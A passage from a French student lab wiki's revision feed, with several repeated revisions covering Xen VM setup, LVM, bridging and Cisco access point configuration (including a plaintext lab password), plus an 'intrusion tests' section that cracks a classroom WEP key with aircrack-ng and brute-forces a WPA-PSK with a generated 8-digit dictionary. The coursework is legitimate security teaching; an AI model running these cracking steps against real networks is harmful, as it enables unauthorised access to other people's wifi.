 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56374</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56374"/>
				<updated>2021-11-18T09:53:17Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56365</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56365"/>
				<updated>2021-11-12T12:31:13Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
